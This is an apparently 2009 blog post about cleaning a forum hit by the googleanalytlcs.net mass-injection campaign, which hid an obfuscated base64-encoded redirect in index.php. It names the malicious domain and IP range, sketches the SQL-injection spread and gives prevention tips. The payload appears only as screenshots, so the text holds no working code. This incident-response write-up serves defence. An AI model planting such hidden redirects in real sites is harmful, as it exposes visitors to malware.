Mass Injection: Infected more than 40,000 Websites

ist2_739213-criminal1

I will be sharing a recent high profile Security breach encountered by me which caused the infection of  40,000+ website worldwide.Till last year we have heard of mass infection of personnel computers but 2009 mark the mass infection of website which indeed is very dangerous to millions of innocent users around the globe.

The attack is very advanced,” says Stephan Chenette, manager of security research at Websense Labs.The attacks, which began about a week ago, show no signs of slowing down, said Dancho in a posting in his blog ,the post also shows the high profile sites infected by the attack.

Unfortunately one of my clients was a victim of this ongoing scenario.His popular forum was under attack since a week  defacing the forum home page and redirecting users to a malicious site googleanalytlcs.net by this anyone who comes to his site will be subject to the attack.  A closer look at the domain googleanalytlcs.net will reveal that it has replaced “i” in analytics to small letter “L“,which tricks users to think its a site owned by google,but its not.

I will explain how I dealt with this situation and all the little decisions I made for solving this problem.I am not able to share the website address due to privacy issues, let us call the forum xyz.com.

STAGE: 1

The owner of the xyz.com calls me and asked to check his website,when I opened it on google chrome I saw this weired alert.It says “Warning:Visting this site may harm your computer” .

Warning given by Google Chrome

First I thought the forum may contain some illegal/malicious files attached by forum members which may have active links to the malicious site. I scanned the database and found nothing.Then I check with SafeBrowsing Advisory provided by Google to know more about the alert.But to my surprise Advisory says the forum is neat and clean seeing this, a lot of questions began to hang in and around me.Is google chrome vulnerable ?So I opened the xyz.com in firefox it didn’t show up the warning,then I checked Internet Explorer 8 it too showed no warning but crashes when attempting to load the forum.So I concluded that it is something to do with chrome which turned my attention in to scanning the source code of the index.php

STAGE: 2

I scanned the source code of the index.php which is considered has the default naming convention for the first page of a website.At the first look it didn’t show up any problem,the below screenshots shows the source code of the index.php.The first arrow shows the starting the source code with an open  php tag.

Click on the Image to get Enlarged View

But when I searched to the right side of the page towards the second arrow I found a suspicious code hidden inside the php tag which is show in below screenshot.

tmhack3-copy2

STAGE:3

For confirming what this code might do I copied the exploit code and inserted it in a file named test.php and opened in the chrome browser to see what happens,bingo!! it just gave the same warning.The warning is showed only for the first time and it creates a cookie named zyipppspgerfd which ensures the alert is showed only once,and if we cleared the cookie and reload the test.php we get the warning again.I deleted the exploit code from the index.php  file and rechecked for any similar codes and I didn’t find anything else.The forum was restored back to normal and undergone sql vulnerability check.

How infection spreads ?

googleanalytlcs
Courtesy:Elad Sharf ,Security Researcher

I did a small research in google and came in to a conclusion that the attack originates with a SQL injection of the code through a form on a web page somewhere on the  site or another on the server where the site is hosted and the autonomous system  spreads malicious code using Scareware, Rogue Antivirus software, and exploit sites (including the latest PDF exploits).The ingenious attack plants itself at the server level and starts searching through folders looking for files with the “index” or “default” names and starts replicating itself to those pages. Just one compromised form on one site in a server will have a cascading affect on every website on the same web server. After the attacker compromises a legitimate website and adds code that silently redirects to the exploit site.Users when browsed to the compromised website redirects unknowingly to exploit site.

Exploit code which invoke an alert in chrome when it tries to redirect.

Click on the Image to get Enlarged View

Technique used to hide exploit code from google

Malicious code is embedded in a php tag which  uses an obfuscation method that begins with the initialization of a string parameter. This gets de-obfuscated and then executed by the browser. This kind of technique can employ many levels of obfuscation ,in which the obfuscated code leads to more obfuscated code, and so on. .The encoded script decode it when invoked (“base64_decode”),this is so that search engines can’t scan it, but Google is one step ahead of them, correctly flagging that the site is infected with malware,the exploit code is  obfuscated which prevent  people from finding what the code actually does. I was not able to fully decode the script in to human readable form,due to lack of time.For web application programmers working on Security firms I have uploaded the obfuscated exploit code in a text file,you can download it from here.I would appreciate if somebody could de-obfuscated the code for geniushackers.com.

For those interested, here is a handy list of online semi-tutorials I collected to know how to de-obfuscate Javascript in webpages,and see where a hidden malware originates,what it does etc.

Daniel Wesemann (SANS)
===================
http://handlers.sans.org/dwesemann/decode/

SANS Internet Storm Center
=====================
http://isc2.sans.org/diary.html?storyid=2268
http://isc2.sans.org/diary.html?storyid=2358
http://isc.sans.org/diary.html?storyid=3219
http://isc.sans.org/diary.html?storyid=1519

top10sites

The above survey is released by Niels Provos, Security Team of Google Online Security Blog on June 3, 2009 .The graph shows the top-10 malware sites as counted by the number of compromised web sites that referenced it. All domains on the top-10 list are suspected to have compromised more than 10,000 web sites on the Internet. The graph also contains arrows indicating when these domains where first listed via the Safe Browsing API and flagged in their search results as potentially dangerous.The domain googleanalytlcs.net stands 2nd on the top 10 list which teaches the gravity of the situation we are facing here.

Is wordpress affected by this  mass injection ?

Unfortunately wordpress version 2.6 and below is vulnerable to this kind of attack which has been confirmed by the ebiquity blog hacked 2 weeks ago.They explained it was due to a Wordpress installation exploit and upgrading the blog to the latest WordPress release, hopefully prevent the exploit from being used again.

Installation of a  plugin Thickbox Gallery v2 aslo caused a file inclusion vulnerability in wordpress which was Discovered By Sirgod

Which Malicious Web Site holds the payload for the attack ?

exploitsiteAccording to the DNS search, the hosting malicious site was located at the IP subnet block of 91.207.61.37 which belongs to a Russian Business Network (RBN). But now the googleanalytlcs.net comes from the IP block of 91.207.61.0/24, which is part of AS48031 NOVIKOV located in the Ukraine.

How to prevent the infection/attack ?

ist2_9219766-big-brother-is-watching-you

  • Check for SQL vulnerability using an updated scanner & tighten up the code that processes all your forms on your site and the webserver(seek the help of  webmaster).
  • The infection is known to spread through  the latest PDF exploits which is more successful because it doesn’t need a Javascript  to make the exploit work,take necessary action to patch it.
  • Upgrade to new wordpress version because wp version below 2.6 are believed vulnerable to this attack.
  • Create a backup copy of the “index” or “default” pages of the website,in case of infection it saves time from re-coding.
  • Shared hosting members must be aware that compromising any website in the same webserver will be fatal to all residing under the shared environment.
  • Do not surf the Internet while you are logged in to your webserver or wordpress account.
  • Configure you firewall to block the IP used by the Malicious Web Site.
  • Subscribe to our RSS feed and stay tuned for more updates.

Author: askoppal

11 thoughts on “Mass Injection: Infected more than 40,000 Websites

  • February 8, 2010 at 11:56 pm
    Permalink

    Veru nicely thanks congrats bro … shall i use this tutorial by giving the reference to geniushackers.com

    Reply
  • January 7, 2010 at 3:52 pm
    Permalink

    Thanks for writing this much clear. I also encountered a same kind of incident. My website was on drupal, and what I did is writing a bash script to clean up everything, and setting it up as a cron job.

    What I’ve done is written here: portal.shaakunthala.com/2010/01/attack-and-defence.html
    (hope you won’t treat this non-clickable url as spam 🙂 )

    Reply
  • October 21, 2009 at 7:06 pm
    Permalink

    Thanks Rosyidi keep reading.. 🙂

    Reply
  • October 10, 2009 at 5:45 pm
    Permalink

    I experienced the SQL injection issue 1 year before, the trick is that the attacker will use the URL QueryString parameter to include their SQL Query to insert contents in to your database.

    To be safe, you should always validate your querystring values strictly, very strictly….

    Senthil,
    http://www.senthil.name.

    Reply
  • August 4, 2009 at 12:19 pm
    Permalink

    nice tutorial , publish some tutoials related to windows api

    Reply
  • June 18, 2009 at 5:50 pm
    Permalink

    Really informative article. Good job, it’s hard to get customers to upgrade WordPress to latest versions to prevent these sort of things. I wish they would listen and just do it 🙂

    Reply
  • June 11, 2009 at 2:47 pm
    Permalink

    Thanks Ricky and Nikhil for the comments!

    Reply
  • June 7, 2009 at 12:31 am
    Permalink

    Very well written and informative article. I shall check my website for this kind of vulnerability.

    Reply
  • June 6, 2009 at 6:52 am
    Permalink

    Nice article boss !!!!
    It’ll certainly help many of us to prevent infections.
    Thanks!!!

    Reply

Leave a Reply

Your email address will not be published. Required fields are marked *

This site uses Akismet to reduce spam. Learn how your comment data is processed.